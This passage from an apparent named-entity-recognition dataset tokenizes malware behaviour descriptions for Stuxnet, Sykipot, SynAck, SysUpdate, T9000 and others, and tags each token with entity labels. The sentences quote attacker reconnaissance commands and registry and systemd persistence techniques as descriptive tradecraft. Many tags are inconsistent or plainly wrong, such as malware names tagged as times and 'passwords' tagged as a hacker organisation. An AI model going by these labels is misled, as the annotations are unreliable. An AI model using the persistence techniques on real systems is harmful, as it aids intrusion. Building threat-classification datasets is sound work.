"O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "infects", - "remote", - "servers", - "via", - "network", - "shares", - "and", - "by", - "infecting", - "WinCC", - "database", - "views", - "with", - "malicious", - "code." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "extracts", - "and", - "writes", - "driver", - "files", - "that", - "match", - "the", - "times", - "of", - "other", - "legitimate", - "files." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "attempts", - "to", - "impersonate", - "an", - "anonymous", - "token", - "to", - "enumerate", - "bindings", - "in", - "the", - "service", - "control", - "manager." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "uses", - "HTTP", - "to", - "communicate", - "with", - "a", - "command", - "and", - "control", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "used", - "WMI", - "with", - "an", - "<code>explorer.exe</code>", - "token", - "to", - "execute", - "on", - "a", - "remote", - "share." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Stuxnet", - "uses", - "a", - "driver", - "registered", - "as", - "a", - "boot", - "start", - "service", - "as", - "the", - "main", - "load-point." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sykipot", - "uses", - "SSL", - "for", - "encrypting", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sykipot", - "may", - "use", - "<code>net", - "group", - "\"domain", - "admins\"", - "/domain</code>", - "to", - "display", - "accounts", - "in", - "the", - "\"domain", - "admins\"", - "permissions", - "group", - "and", - "<code>net", - "localgroup", - "\"administrators\"</code>", - "to", - "list", - "local", - "system", - "administrator", - "group", - "membership." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sykipot", - "injects", - "itself", - "into", - "running", - "instances", - "of", - "outlook.exe,", - "iexplore.exe,", - "or", - "firefox.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Sykipot", - "contains", - "keylogging", - "functionality", - "to", - "steal", - "passwords." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Sykipot", - "is", - "known", - "to", - "contain", - "functionality", - "that", - "enables", - "targeting", - "of", - "smart", - "card", - "technologies", - "to", - "proxy", - "authentication", - "for", - "connections", - "to", - "restricted", - "network", - "resources", - "using", - "detected", - "hardware", - "tokens." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sykipot", - "may", - "gather", - "a", - "list", - "of", - "running", - "processes", - "by", - "running", - "<code>tasklist", - "/v</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sykipot", - "has", - "been", - "known", - "to", - "establish", - "persistence", - "by", - "adding", - "programs", - "to", - "the", - "Run", - "Registry", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sykipot", - "may", - "use", - "<code>net", - "view", - "/domain</code>", - "to", - "display", - "hostnames", - "of", - "available", - "systems", - "on", - "a", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sykipot", - "may", - "use", - "<code>ipconfig", - "/all</code>", - "to", - "gather", - "system", - "network", - "configuration", - "details." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Sykipot", - "may", - "use", - "<code>netstat", - "-ano</code>", - "to", - "display", - "active", - "network", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sykipot", - "may", - "use", - "<code>net", - "start</code>", - "to", - "display", - "running", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "clears", - "event", - "logs." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "encrypts", - "the", - "victims", - "machine", - "followed", - "by", - "asking", - "the", - "victim", - "to", - "pay", - "a", - "ransom." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "checks", - "its", - "directory", - "location", - "in", - "an", - "attempt", - "to", - "avoid", - "launching", - "in", - "a", - "sandbox." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "can", - "manipulate", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "SynAck", - "parses", - "the", - "export", - "tables", - "of", - "system", - "DLLs", - "to", - "locate", - "and", - "call", - "various", - "Windows", - "API", - "functions." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "payloads", - "are", - "obfuscated", - "prior", - "to", - "compilation", - "to", - "inhibit", - "analysis", - "and/or", - "reverse", - "engineering." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "enumerates", - "all", - "running", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "abuses", - "NTFS", - "transactions", - "to", - "launch", - "and", - "conceal", - "malicious", - "processes." - ], - "ner_tags": [ - "B-Way", - "I-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "enumerates", - "Registry", - "keys", - "associated", - "with", - "event", - "logs." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "checks", - "its", - "directory", - "location", - "in", - "an", - "attempt", - "to", - "avoid", - "launching", - "in", - "a", - "sandbox." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "gathers", - "computer", - "names,", - "OS", - "version", - "info,", - "and", - "also", - "checks", - "installed", - "keyboard", - "layouts", - "to", - "estimate", - "if", - "it", - "has", - "been", - "launched", - "from", - "a", - "certain", - "list", - "of", - "countries." - ], - "ner_tags": [ - "B-Time", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "lists", - "all", - "the", - "keyboard", - "layouts", - "installed", - "on", - "the", - "victim’s", - "system", - "using", - "<code>GetKeyboardLayoutList</code>", - "API", - "and", - "checks", - "against", - "a", - "hardcoded", - "language", - "code", - "list.", - "If", - "a", - "match", - "if", - "found,", - "SynAck", - "sleeps", - "for", - "300", - "seconds", - "and", - "then", - "exits", - "without", - "encrypting", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "gathers", - "user", - "names", - "from", - "infected", - "hosts." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SynAck", - "enumerates", - "all", - "running", - "services." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Idus" - ] - }, - { - "tokens": [ - "Sys10", - "collects", - "the", - "group", - "name", - "of", - "the", - "logged-in", - "user", - "and", - "sends", - "it", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sys10", - "uses", - "an", - "XOR", - "0x1", - "loop", - "to", - "encrypt", - "its", - "C2", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sys10", - "collects", - "the", - "computer", - "name,", - "OS", - "versioning", - "information,", - "and", - "OS", - "install", - "date", - "and", - "sends", - "the", - "information", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sys10", - "collects", - "the", - "local", - "IP", - "address", - "of", - "the", - "victim", - "and", - "sends", - "it", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sys10", - "collects", - "the", - "account", - "name", - "of", - "the", - "logged-in", - "user", - "and", - "sends", - "it", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sys10", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "been", - "signed", - "with", - "stolen", - "digital", - "certificates." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "load", - "DLLs", - "through", - "vulnerable", - "legitimate", - "executables." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "used", - "DNS", - "TXT", - "requests", - "as", - "for", - "its", - "C2", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "collect", - "information", - "and", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "deobfuscate", - "packed", - "binaries", - "in", - "memory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "encrypt", - "and", - "encode", - "its", - "configuration", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "exfiltrated", - "data", - "over", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "delete", - "its", - "configuration", - "file", - "from", - "the", - "targeted", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "search", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "store", - "its", - "encoded", - "configuration", - "file", - "within", - "<code>Software\\Classes\\scConfig</code>", - "in", - "either", - "<code>HKEY_LOCAL_MACHINE</code>", - "or", - "<code>HKEY_CURRENT_USER</code>." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "the", - "ability", - "to", - "set", - "file", - "attributes", - "to", - "hidden." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "the", - "ability", - "to", - "download", - "files", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "contact", - "the", - "DNS", - "server", - "operated", - "by", - "Google", - "as", - "part", - "of", - "its", - "C2", - "establishment", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "named", - "their", - "unit", - "configuration", - "file", - "similarly", - "to", - "other", - "unit", - "files", - "residing", - "in", - "the", - "same", - "directory,", - "`/usr/lib/systemd/system/`,", - "to", - "appear", - "benign." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "write", - "its", - "configuration", - "file", - "to", - "<code>Software\\Classes\\scConfig</code>", - "in", - "either", - "<code>HKEY_LOCAL_MACHINE</code>", - "or", - "<code>HKEY_CURRENT_USER</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "call", - "the", - "`GetNetworkParams`", - "API", - "as", - "part", - "of", - "its", - "C2", - "establishment", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "collect", - "information", - "about", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "use", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "the", - "ability", - "to", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "manage", - "services", - "and", - "processes." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "been", - "packed", - "with", - "VMProtect." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "used", - "Base64", - "to", - "encode", - "its", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "has", - "used", - "DES", - "to", - "encrypt", - "all", - "C2", - "communications." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "collect", - "a", - "system's", - "architecture,", - "operating", - "system", - "version,", - "hostname,", - "and", - "drive", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "collected", - "the", - "IP", - "address", - "and", - "domain", - "name", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "collect", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "collect", - "a", - "list", - "of", - "services", - "on", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "copy", - "a", - "script", - "to", - "the", - "user", - "owned", - "`/usr/lib/systemd/system/`", - "directory", - "with", - "a", - "symlink", - "mapped", - "to", - "a", - "`root`", - "owned", - "directory,", - "`/etc/ystem/system`,", - "in", - "the", - "unit", - "configuration", - "file's", - "`ExecStart`", - "directive", - "to", - "establish", - "persistence", - "and", - "elevate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "use", - "WMI", - "for", - "execution", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SysUpdate", - "can", - "create", - "a", - "service", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Systeminfo", - "can", - "be", - "used", - "to", - "gather", - "information", - "about", - "the", - "operating", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "a", - "victim", - "meets", - "certain", - "criteria,", - "T9000", - "uses", - "the", - "AppInit_DLL", - "functionality", - "to", - "achieve", - "persistence", - "by", - "ensuring", - "that", - "every", - "user", - "mode", - "process", - "that", - "is", - "spawned", - "will", - "load", - "its", - "malicious", - "DLL,", - "ResN32.dll.", - "It", - "does", - "this", - "by", - "creating", - "the", - "following", - "Registry", - "keys:", - "<code>HKLM\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Windows\\AppInit_DLLs", - "–", - "%APPDATA%\\Intel\\ResN32.dll</code>", - "and", - "<code>HKLM\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Windows\\LoadAppInit_DLLs", - "–", - "0x1</code>." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "encrypts", - "collected", - "data", - "using", - "a", - "single", - "byte", - "XOR", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "uses", - "the", - "Skype", - "API", - "to", - "record", - "audio", - "and", - "video", - "calls.", - "It", - "writes", - "encrypted", - "data", - "to", - "<code>%APPDATA%\\Intel\\Skype</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "searches", - "removable", - "storage", - "devices", - "for", - "files", - "with", - "a", - "pre-defined", - "list", - "of", - "file", - "extensions", - "(e.g.", - "*", - ".doc,", - "*.ppt,", - "*.xls,", - "*.docx,", - "*.pptx,", - "*.xlsx).", - "Any", - "matching", - "files", - "are", - "encrypted", - "and", - "written", - "to", - "a", - "local", - "user", - "directory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "the", - "T9000", - "installation", - "process,", - "it", - "drops", - "a", - "copy", - "of", - "the", - "legitimate", - "Microsoft", - "binary", - "igfxtray.exe.", - "The", - "executable", - "contains", - "a", - "side-loading", - "weakness", - "which", - "is", - "used", - "to", - "load", - "a", - "portion", - "of", - "the", - "malware." - ], - "ner_tags": [ - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "searches", - "through", - "connected", - "drives", - "for", - "removable", - "storage", - "devices." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "can", - "take", - "screenshots", - "of", - "the", - "desktop", - "and", - "target", - "application", - "windows,", - "saving", - "them", - "to", - "user", - "directories", - "as", - "one", - "byte", - "XOR", - "encrypted", - ".dat", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "performs", - "checks", - "for", - "various", - "antivirus", - "and", - "security", - "products", - "during", - "installation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "gathers", - "and", - "beacons", - "the", - "operating", - "system", - "build", - "number", - "and", - "CPU", - "Architecture", - "(32-bit/64-bit)", - "during", - "installation." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "gathers", - "and", - "beacons", - "the", - "MAC", - "and", - "IP", - "addresses", - "during", - "installation." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "gathers", - "and", - "beacons", - "the", - "username", - "of", - "the", - "logged", - "in", - "account", - "during", - "installation.", - "It", - "will", - "also", - "gather", - "the", - "username", - "of", - "running", - "processes", - "to", - "determine", - "if", - "it", - "is", - "running", - "as", - "SYSTEM." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "T9000", - "gathers", - "and", - "beacons", - "the", - "system", - "time", - "during", - "installation." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "I-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "T9000", - "uses", - "the", - "Skype", - "API", - "to", - "record", - "audio", - "and", - "video", - "calls.", - "It", - "writes", - "encrypted", - "data", - "to", - "<code>%APPDATA%\\Intel\\Skype</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "has", - "used", - "<code>FileReadZipSend</code>", - "to", - "compress", - "a", - "file", - "and", - "send", - "to", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "execute", - "<code>FileRecvWriteRand</code>", - "to", - "append", - "random", - "bytes", - "to", - "the", - "end", - "of", - "a", - "file", - "received", - "from", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "randomly", - "pick", - "one", - "of", - "five", - "hard-coded", - "IP", - "addresses", - "for", - "C2", - "communication;", - "if", - "one", - "of", - "the", - "IP", - "fails,", - "it", - "will", - "wait", - "60", - "seconds", - "and", - "then", - "try", - "another", - "IP", - "address." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "delete", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "use", - "<code>DirectoryList</code>", - "to", - "enumerate", - "files", - "in", - "a", - "specified", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "download", - "additional", - "modules", - "from", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "TAINTEDSCRIBE", - "main", - "executable", - "has", - "disguised", - "itself", - "as", - "Microsoft’s", - "Narrator." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "execute", - "<code>ProcessList</code>", - "for", - "process", - "discovery." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "has", - "used", - "FakeTLS", - "for", - "session", - "authentication." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TAINTEDSCRIBE", - "can", - "copy", - "itself", - "into", - "the", - "current", - "user’s", - "Startup", - "folder", - "as", - "“Narrator.exe”", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] 